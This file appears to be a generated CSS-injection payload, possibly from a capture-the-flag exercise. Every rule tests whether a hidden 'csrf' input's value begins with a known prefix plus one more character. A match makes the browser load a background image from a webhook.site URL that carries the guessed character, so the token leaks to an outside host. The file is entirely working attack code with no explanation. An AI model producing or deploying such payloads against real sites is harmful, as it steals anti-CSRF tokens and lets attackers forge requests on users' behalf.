input.csrf[value^='ruW-tjL1BWCdhbiOSCA7a'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7a); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7b'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7b); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7c'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7c); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7d'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7d); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7e'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7e); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7f'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7f); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7g'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7g); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7h'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7h); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7i'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7i); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7j'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7j); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7k'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7k); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7l'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7l); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7m'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7m); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7n'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7n); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7o'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7o); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7p'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7p); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7q'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7q); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7r'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7r); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7s'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7s); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7t'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7t); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7u'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7u); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7v'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7v); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7w'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7w); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7x'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7x); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7y'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7y); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7z); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7A'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7A); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7B'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7B); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7C'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7C); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7D'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7D); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7E'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7E); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7F'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7F); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7G'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7G); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7H'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7H); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7I'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7I); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7J'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7J); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7K'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7K); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7L'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7L); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7M'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7M); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7N'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7N); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7O'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7O); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7P'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7P); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7Q'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7Q); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7R'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7R); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7S'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7S); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7T'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7T); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7U); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7V'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7V); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7W'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7W); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7X'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7X); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7Y'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7Y); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7Z'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7Z); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA70'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA70); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA71'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA71); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA72'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA72); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA73'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA73); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA74'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA74); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA75'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA75); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA76'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA76); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA77'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA77); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA78'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA78); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA79'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA79); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7²'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7²); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7&'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7&); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7é'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7é); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7~'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7~); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7"'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7"); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7#'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7#); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7''] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7'); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7{'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7{); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7('] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7(); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7['] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7[); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7-'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7-); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7|'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7|); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7è'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7è); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7`'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7`); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7_'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7_); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7\'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7\); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7ç'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7ç); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7^'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7^); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7à'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7à); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7@'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7@); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7)'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7)); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7]'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7]); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7='] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7=); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7}'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7}); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7°'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7°); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7/'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7/); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7+'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7+); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7,'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7,); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7?'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7?); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7;'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7;); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7.'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7.); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7:'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7:); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7!'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7!); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7§'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7§); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7%'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7%); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7ù'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7ù); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7*'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7*); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7µ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7µ); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7$'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7$); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7£'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7£); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7¤'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7¤); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7¨'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7¨); }

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7 '] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW-tjL1BWCdhbiOSCA7 ); }
